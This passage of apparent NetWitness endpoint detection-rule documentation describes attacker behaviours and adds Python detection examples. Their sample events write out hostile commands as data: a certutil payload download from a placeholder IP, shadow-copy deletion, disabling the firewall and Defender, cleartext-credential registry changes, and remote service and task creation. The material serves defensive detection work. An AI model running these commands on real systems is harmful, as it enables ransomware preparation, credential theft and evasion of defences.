* analysis.file = creates password-protected archive
Display Name: Creates Recursive Archive
File Name: creates_recursive_archive
Description: Creating a recursive archive could be an attempt to exfiltrate many files at once.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = creates recursive archive
Display Name: Creates Remote Process Using WMI Command-Line Tool
File Name: creates_remote_process_using_wmi_command-line_tool
Description: Creating a remote process using the WMI command-line tool can be an indication of someone using WMI to interact with local and remote systems as a means to perform many tactical functions, such as gathering information for Discovery and remote execution of files as part of Lateral Movement.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote process using wmi command-line tool
Display Name: Creates Remote Service
File Name: creates_remote_service
Description: Creating a remote service can be an indication of someone trying to maintain a persistent presence on the system using remote services, which can modify the registry, escalate privileges and create a backdoor.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote service
Display Name: Creates Remote Task
File Name: creates_remote_task
Description: Creating a remote task can be an indication of someone trying to use task scheduling to execute programs at system startup or on a schedule for persistence, to conduct remote execution as part of lateral movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates remote task
Display Name: Creates Shadow Volume For Logical Drive
File Name: creates_shadow_volume_for_logical_drive
Description: Creating a shadow volume for a logical drive can be an indication of someone trying to dump credentials from shadow backup copies of the system in order to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates shadow volume for logical drive
Display Name: Creates Suspicious Service Running Command Prompt
File Name: creates_suspicious_service_running_command_prompt
Description: Creating a suspicious service that runs the command prompt can be an indication of someone trying to create and run malicious services to exploit the system, which can be used further to gain access, move laterally or gain elevated privileges. Attackers may take advantage of this to proxy execution of code and avoid triggering security tools.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = creates suspicious service running command prompt
Deletes Backup Catalog (deletes_backup_catalog)
Deleting the backup catalog can be an indication of someone trying to remove files over the course of an intrusion to keep their footprint low, to remove them at the end as part of post-intrusion cleanup, or to prevent recovery of the system (a common step before ransomware encrypts files).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes backup catalog
Deletes Firewall Rule (deletes_firewall_rule)
Deleting a firewall rule can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult because there is not enough data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = deletes firewall rule
Deletes Shadow Volume Copies (deletes_shadow_volume_copies)
Deleting shadow volume copies can be an indication of someone trying to remove files over the course of an intrusion to keep their footprint low, to remove them at the end as part of post-intrusion cleanup, or to prevent recovery of the system (a common step before ransomware encrypts files).

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes shadow volume copies
Deletes USN Change Journal (deletes_usn_change_journal)
Deleting the USN change journal can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult because there is not enough data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = deletes usn change journal
Disables Firewall (disables_firewall)
Disabling the firewall can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult because there is not enough data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables firewall
Disables Security Service (disables_security_service)
Disabling a security service can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult because there is not enough data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables security service
Disables Startup Repair (disables_startup_repair)
Disabling startup repair can be an indication of someone trying to remove files over the course of an intrusion to keep their footprint low, to remove them at the end as part of post-intrusion cleanup, or to prevent recovery of the system after its files have been destroyed or encrypted.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = disables startup repair
Disables UAC (disables_uac)
Disabling Windows User Account Control (UAC) can be an attempt to bypass UAC. Attackers can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables uac
Disables UAC Remote Restrictions (disables_uac_remote_restrictions)
Disabling UAC remote restrictions can be an attempt to bypass Windows User Account Control (UAC) for remote connections, so that a local administrator account receives a full administrative token over the network. Attackers can use these techniques to elevate privileges to administrator if the target process is unprotected. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = disables uac remote restrictions
Disables Windows Defender Using Powershell (disables_windows_defender_using_powershell)
Disabling Windows Defender using PowerShell can be an indication of someone trying to compromise the integrity of the security solution, causing events to go unreported, or to make forensic analysis and incident response more difficult because there is not enough data to determine whether an incident occurred.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = disables windows defender using powershell
Downloads Binary Using Certutil (downloads_binary_using_certutil)
CertUtil, the Windows certificate management utility, can install, back up, delete and manage certificates and certificate stores. Downloading a binary with certutil can be an indication of someone trying to download malicious code to exploit the system, which can then be used to gain access, move laterally or gain elevated privileges.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = downloads binary using certutil
Drops Credential Dumping Tools (drops_credential_dumping_tools)
Dropping credential dumping tools can be an indication of someone trying to harvest credentials in order to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = drops credential dumping library
Dumps DNS Cache (dumps_dns_cache)
Dumping the DNS cache can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = dumps dns cache
Dyld Inserted (dyld_inserted)
macOS and OS X use a common method to look for required dynamic libraries (dylibs) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths, or of the DYLD_INSERT_LIBRARIES environment variable that forces dyld to load a library into a process, to plant dylibs and gain privilege escalation or persistence.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = dyld inserted
Enables Cleartext Credential Storage (enables_cleartext_credential_storage)
Enabling cleartext credential storage can be an indication of someone trying to harvest plaintext credentials in order to gain a privileged foothold, allowing them unfettered access to elevate privileges and move about the network freely without detection.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* eoc = enables cleartext credential storage
Enables Login Bypass (enables_login_bypass)
Windows accessibility features can be launched with a key combination before a user has logged in. Enabling login bypass can be an indication of someone trying to modify the way these programs are launched in order to maintain a persistent presence on the system, escalate privileges and create a backdoor that is reachable without logging in.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* ioc = enables login bypass
Enables RDP From Command-Line (enables_rdp_from_command-line)
Enabling RDP from the command line can be an indication of adversaries trying to connect to a remote system over RDP/RDS to expand access, if the service is enabled and allows access to accounts with known credentials. Adversaries may also use RDP in conjunction with the Accessibility Features technique for persistence, or perform RDP session hijacking, which involves stealing a legitimate user's remote session.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enables rdp from command-line
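Most of the rules above (creating shadow copies, deleting shadow copies and the backup catalog, disabling startup repair, deleting the USN journal, disabling or editing the firewall, disabling Defender from PowerShell, downloading with certutil, enabling cleartext credential storage, disabling UAC remote restrictions, enabling RDP, and creating remote services and tasks) come down to matching a process's command line. The following Python script is an added example of that kind of matching and is not RSA's rule logic, which this page does not publish; the regular expressions are assumptions about what each rule name implies, and the sample events are constructed, not real telemetry. The normalization step is the part worth copying: case, quoting and whitespace are the cheapest things for an attacker to vary.

```python
import re

# Illustrative rules (assumptions, NOT RSA's published definitions). The key is
# the meta value the rule would emit; every pattern in the list must match the
# normalized command line. Alternatives for one rule go inside a pattern with "|".
RULES = {
    "creates shadow volume for logical drive": [
        r"\bvssadmin(\.exe)?\s+create\s+shadow\b|\bwmic(\.exe)?\s+shadowcopy\s+call\s+create\b"],
    "deletes shadow volume copies": [
        r"\bvssadmin(\.exe)?\s+delete\s+shadows\b|\bwmic(\.exe)?\s+shadowcopy\s+delete\b"],
    "deletes backup catalog": [r"\bwbadmin(\.exe)?\s+delete\s+catalog\b"],
    "disables startup repair": [r"\bbcdedit(\.exe)?\s", r"\brecoveryenabled\s+no\b"],
    "deletes usn change journal": [r"\bfsutil(\.exe)?\s+usn\s+deletejournal\b"],
    "disables firewall": [r"\bnetsh(\.exe)?\s+advfirewall\s+set\s+\w+\s+state\s+off\b"],
    "deletes firewall rule": [r"\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+delete\s+rule\b"],
    "disables windows defender using powershell": [
        r"\bset-mppreference\b", r"-disablerealtimemonitoring\s+(\$true|1)\b"],
    "downloads binary using certutil": [r"\bcertutil(\.exe)?\s", r"-urlcache\b", r"\bhttps?://"],
    "enables cleartext credential storage": [
        r"\breg(\.exe)?\s+add\s", r"\\wdigest\b", r"/v\s+uselogoncredential\b", r"/d\s+(0x)?0*1\b"],
    "disables uac remote restrictions": [
        r"\breg(\.exe)?\s+add\s", r"/v\s+localaccounttokenfilterpolicy\b", r"/d\s+(0x)?0*1\b"],
    "enables rdp from command-line": [
        r"\breg(\.exe)?\s+add\s", r"\\terminal server\b", r"/v\s+fdenytsconnections\b", r"/d\s+(0x)?0*0\b"],
    "creates remote service": [r"\bsc(\.exe)?\s+\\\\\S+\s+create\b"],
    "creates remote task": [r"\bschtasks(\.exe)?\s", r"/create\b", r"\s/s\s+\S+"],
}
COMPILED = {name: [re.compile(p) for p in pats] for name, pats in RULES.items()}

# Constructed sample of process command lines (not real telemetry).
SAMPLE_EVENTS = [
    "cmd.exe /c vssadmin create shadow /for=C:",
    "VssAdmin.exe  Delete   Shadows /All /Quiet",
    "wbadmin delete catalog -quiet",
    "bcdedit /set {default} recoveryenabled No",
    "fsutil usn deletejournal /D C:",
    "netsh advfirewall set allprofiles state off",
    'netsh advfirewall firewall delete rule name="Remote Desktop"',
    "powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true",
    "certutil.exe -urlcache -split -f http://203.0.113.7/a.exe a.exe",
    r"reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
    r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f",
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    r"sc \\FILESRV01 create updsvc binPath= C:\Windows\Temp\u.exe start= auto",
    r"schtasks /create /s FILESRV01 /tn Upd /tr C:\Windows\Temp\u.exe /sc onstart /ru SYSTEM",
    "vssadmin list shadows",                                   # benign: listing, not creating or deleting
    r"reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential",  # benign query
]


def normalize(cmdline: str) -> str:
    """Lower-case, drop quotes and collapse whitespace so trivially varied
    spellings ('VssAdmin   Delete  Shadows') still hit the same pattern."""
    return " ".join(cmdline.replace('"', "").replace("'", "").split()).lower()


def evaluate(cmdline: str) -> list:
    """Meta values (rule names) that fire for one command line."""
    norm = normalize(cmdline)
    return [name for name, pats in COMPILED.items() if all(p.search(norm) for p in pats)]


def scan(events):
    """[(command line, [rule names])] for a batch of events."""
    return [(cmd, evaluate(cmd)) for cmd in events]


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{hits or ['-']}: {cmd}")
```

The `reg add` rules check the value name and the data separately, so `reg query` of the same key (a common administrative check) does not fire, and `sc create` without a `\\host` argument is left to a local-service rule rather than the remote one.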
Enumerates ARP Table (enumerates_arp_table)
Enumeration of the ARP table can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates arp table
Enumerates Available Systems On Network (enumerates_available_systems_on_network)
Enumeration of the systems available on the network can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates available systems on network
Enumerates Domain Account Policy (enumerates_domain_account_policy)
Enumeration of the domain account policy (for example lockout thresholds before a password spray) can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain account policy
Enumerates Domain Administrators (enumerates_domain_administrators)
Enumeration of domain administrators can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain administrators
Enumerates Domain Computers (enumerates_domain_computers)
Enumeration of domain computers can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain computers
Enumerates Domain Controllers (enumerates_domain_controllers)
Enumeration of domain controllers can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain controllers
Enumerates Domain Groups (enumerates_domain_groups)
Enumeration of domain groups can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain groups
Enumerates Domain Users (enumerates_domain_users)
Enumeration of domain users can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates domain users
Enumerates Enterprise Administrators (enumerates_enterprise_administrators)
Enumeration of enterprise administrators can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates enterprise administrators
Enumerates Exchange Domain Servers (enumerates_exchange_domain_servers)
Enumeration of Exchange domain servers can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates exchange domain servers
Enumerates Exchange Servers (enumerates_exchange_servers)
Enumeration of Exchange servers can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates exchange servers
Enumerates IP Configuration (enumerates_ip_configuration)
Enumeration of the IP configuration can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates ip configuration
Enumerates Local Account Policy (enumerates_local_account_policy)
Enumeration of the local account policy can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local account policy
Enumerates Local Administrators (enumerates_local_administrators)
Enumeration of local administrators can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local administrators
Enumerates Local Administrators On Domain Controller (enumerates_local_administrators_on_domain_controller)
Enumeration of local administrators on a domain controller can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local administrators on domain controller
Enumerates Local Groups (enumerates_local_groups)
Enumeration of local groups can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local groups
Enumerates Local Services (enumerates_local_services)
Enumeration of local services can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates local services
Enumerates Local Users (enumerates_local_users)
Enumeration of local users can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates local users
Enumerates Logical Disk (enumerates_logical_disk)
Enumeration of logical disks can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates logical disk
Enumerates Mapped Resources (enumerates_mapped_resources)
Enumeration of mapped resources can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates mapped resources
Enumerates Network Connections (enumerates_network_connections)
Enumeration of network connections can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates network connections
Enumerates Primary Domain Controller (enumerates_primary_domain_controller)
Enumeration of the primary domain controller can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates primary domain controller
Enumerates Processes On Local System (enumerates_processes_on_local_system)
Enumeration of processes on the local system can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates processes on local system
Enumerates Processes On Remote System (enumerates_processes_on_remote_system)
Enumeration of processes on a remote system can be an indication of someone trying to discover potential attack vectors on that system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates processes on remote system
Enumerates Remote Netbios Name Table (enumerates_remote_netbios_name_table)
Enumeration of a remote NetBIOS name table can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates remote netbios name table
Enumerates Remote Resources (enumerates_remote_resources)
Enumeration of remote resources can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates remote resources
Enumerates Route Table (enumerates_route_table)
Enumeration of the routing table can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates route table
Enumerates Services Hosted In Processes (enumerates_services_hosted_in_processes)
Enumeration of the services hosted in processes can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* analysis.file = enumerates services hosted in processes
Enumerates System Info (enumerates_system_info)
Enumeration of system information can be an indication of someone trying to discover potential attack vectors on the system, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates system info
Enumerates Trusted Domains (enumerates_trusted_domains)
Enumeration of trusted domains can be an indication of someone trying to discover potential attack vectors, which can then be used for further exploitation.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 and higher

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = enumerates trusted domains
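Every enumeration rule from Enumerates ARP Table through Enumerates Trusted Domains describes a command that administrators also run, so on its own each produces noise. What separates an intrusion from an administrator is that many distinct discovery commands land on one host, from one account, within minutes. The following Python example is added here and is not RSA's implementation: it classifies each command line with illustrative patterns (assumptions about what the rule names imply) and then flags a host/user pair that triggers five or more distinct discovery rules inside a ten-minute sliding window. The window, the threshold and the sample events are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Illustrative command-line patterns for the discovery rules above (assumptions,
# not RSA's rule definitions). Pattern -> meta value the rule would emit.
DISCOVERY_RULES = [
    (r"\bnet1?(\.exe)?\s+group\s+domain admins\b", "enumerates domain administrators"),
    (r"\bnet1?(\.exe)?\s+group\s+enterprise admins\b", "enumerates enterprise administrators"),
    (r"\bnet1?(\.exe)?\s+user\b.*\s/domain\b", "enumerates domain users"),
    (r"\bnet1?(\.exe)?\s+accounts\s+/domain\b", "enumerates domain account policy"),
    (r"\bnet1?(\.exe)?\s+localgroup\s+administrators\b", "enumerates local administrators"),
    (r"\bnet1?(\.exe)?\s+view\b", "enumerates available systems on network"),
    (r"\bnltest(\.exe)?\s.*/dclist\b", "enumerates domain controllers"),
    (r"\bnltest(\.exe)?\s.*/domain_trusts\b", "enumerates trusted domains"),
    (r"\barp(\.exe)?\s+-a\b", "enumerates arp table"),
    (r"\bipconfig(\.exe)?\s+/all\b", "enumerates ip configuration"),
    (r"\bipconfig(\.exe)?\s+/displaydns\b", "dumps dns cache"),
    (r"\bnetstat(\.exe)?\s+-\w*[an]", "enumerates network connections"),
    (r"\broute(\.exe)?\s+print\b", "enumerates route table"),
    (r"\btasklist(\.exe)?\s+/svc\b", "enumerates services hosted in processes"),
    (r"\btasklist(\.exe)?\s+/s\s+\S+", "enumerates processes on remote system"),
    (r"\bsysteminfo(\.exe)?\b", "enumerates system info"),
    (r"\bnbtstat(\.exe)?\s+-a\s+\S+", "enumerates remote netbios name table"),
]
COMPILED = [(re.compile(p), name) for p, name in DISCOVERY_RULES]

# Constructed endpoint events: (timestamp, host, user, command line).
T0 = datetime(2020, 2, 14, 9, 0, 0)
SAMPLE_EVENTS = [
    (T0 + timedelta(seconds=12), "WS042", r"CORP\jsmith", "ipconfig /all"),
    (T0 + timedelta(seconds=40), "WS042", r"CORP\jsmith", "net view /domain"),
    (T0 + timedelta(seconds=63), "WS042", r"CORP\jsmith", 'net group "Domain Admins" /domain'),
    (T0 + timedelta(seconds=90), "WS042", r"CORP\jsmith", "nltest /dclist:corp.example"),
    (T0 + timedelta(seconds=135), "WS042", r"CORP\jsmith", "net user /domain"),
    (T0 + timedelta(seconds=230), "WS042", r"CORP\jsmith", "nltest /domain_trusts"),
    (T0 + timedelta(seconds=250), "WS042", r"CORP\jsmith", "arp -a"),
    # A monitoring account runs the same kinds of commands, but hours apart.
    (T0 - timedelta(hours=1), "SRV-MON", r"CORP\svc_monitor", "systeminfo"),
    (T0 + timedelta(hours=1, minutes=30), "SRV-MON", r"CORP\svc_monitor", "ipconfig /all"),
    (T0 + timedelta(hours=4), "SRV-MON", r"CORP\svc_monitor", "netstat -ano"),
]


def normalize(cmdline: str) -> str:
    return " ".join(cmdline.replace('"', "").replace("'", "").split()).lower()


def classify(cmdline: str) -> list:
    """Discovery rule names that a single command line triggers."""
    norm = normalize(cmdline)
    return [name for pat, name in COMPILED if pat.search(norm)]


def discovery_bursts(events, window=timedelta(minutes=10), threshold=5) -> dict:
    """Return {(host, user): (first_ts, last_ts, sorted rule names)} for each
    host/user pair that triggers `threshold` DISTINCT discovery rules within a
    sliding `window`. Repeating one command does not raise the count."""
    recent = defaultdict(deque)          # (host, user) -> deque of (ts, rule)
    alerts = {}
    for ts, host, user, cmdline in sorted(events):
        key = (host, user)
        for rule in classify(cmdline):
            q = recent[key]
            q.append((ts, rule))
            while ts - q[0][0] > window:  # expire entries older than the window
                q.popleft()
            distinct = {r for _, r in q}
            if len(distinct) >= threshold and key not in alerts:
                alerts[key] = (q[0][0], ts, sorted(distinct))
    return alerts


if __name__ == "__main__":
    for (host, user), (first, last, rules) in discovery_bursts(SAMPLE_EVENTS).items():
        print(f"{host} {user}: {len(rules)} discovery rules between {first:%H:%M:%S} and {last:%H:%M:%S}")
        for r in rules:
            print("   ", r)
```

Counting distinct rules rather than raw events is what keeps a script that polls `netstat` every minute from tripping the threshold; tuning the window and threshold against the organisation's own administrative baseline is the real work.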
Evasive Powershell Used Over Network (evasive_powershell_used_over_network)
This rule triggers when PowerShell launched with evasive options is detected through a network event. Automated tools such as PowerShell Empire run evasive remote PowerShell commands over the network. Adversaries can use this technique for execution while evading defenses.

VERSIONS SUPPORTED
* NetWitness Platform 11.3 (Investigation Only)
* NetWitness Platform 11.4 and higher (Full Support)

DEPENDENCIES
* NetWitness Endpoint Server

GENERATED META KEYS
* boc = evasive powershell used over network
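Two details make the evasive-PowerShell rule above harder to write than it looks: powershell.exe accepts any unambiguous prefix of a switch, so `-nop`, `-NoP` and `-NoProfile` are the same option, and the payload after `-EncodedCommand` is the script in UTF-16LE, base64-encoded, so a plain string match on the command line sees nothing. The following Python example is added here and is not RSA's rule logic; the minimal-prefix table reflects my reading of powershell.exe's parameter parser and should be treated as an assumption, and the launcher command line is constructed in the style of an Empire stager rather than captured from a real one.

```python
import base64
import re

# Canonical switch and the shortest prefix powershell.exe accepts for it
# (assumption: my reading of the console host's parameter parser).
SWITCHES = [
    ("noprofile", "nop"), ("noninteractive", "noni"), ("nologo", "nol"),
    ("noexit", "noe"), ("windowstyle", "w"), ("executionpolicy", "ex"),
    ("encodedcommand", "e"), ("command", "c"), ("file", "f"),
    ("sta", "sta"), ("mta", "mta"), ("version", "v"),
]
ALIASES = {"ep": "executionpolicy", "ec": "encodedcommand"}
TAKES_VALUE = {"windowstyle", "executionpolicy", "encodedcommand", "file", "version"}
# Markers of a download-and-execute cradle in the (decoded) script body.
CRADLE_PATTERNS = [r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
                   r"net\.webclient", r"invoke-webrequest", r"frombase64string"]


def canonical(token: str):
    """Expand an abbreviated switch ('-NoP', '/w', '-ep') to its canonical name."""
    t = token.lstrip("-/").lower()
    if t in ALIASES:
        return ALIASES[t]
    for name, shortest in SWITCHES:
        if len(t) >= len(shortest) and name.startswith(t):
            return name
    return None


def parse(cmdline: str) -> dict:
    """Map canonical switches to their values for one powershell command line."""
    tokens = cmdline.split()
    opts = {}
    i = 1                                    # tokens[0] is the image
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if not tok.startswith(("-", "/")):
            continue
        name, _, inline_value = tok.partition(":")   # handles -WindowStyle:Hidden
        switch = canonical(name)
        if switch is None:
            continue
        if switch == "command":              # everything after -Command is the script
            opts[switch] = inline_value or " ".join(tokens[i:])
            break
        value = None
        if switch in TAKES_VALUE:
            if inline_value:
                value = inline_value
            elif i < len(tokens):
                value = tokens[i]
                i += 1
        opts[switch] = value
    return opts


def encode_command(script: str) -> str:
    """The value powershell.exe expects after -EncodedCommand: base64 of the
    script encoded as UTF-16LE. Launchers build their payload exactly this way."""
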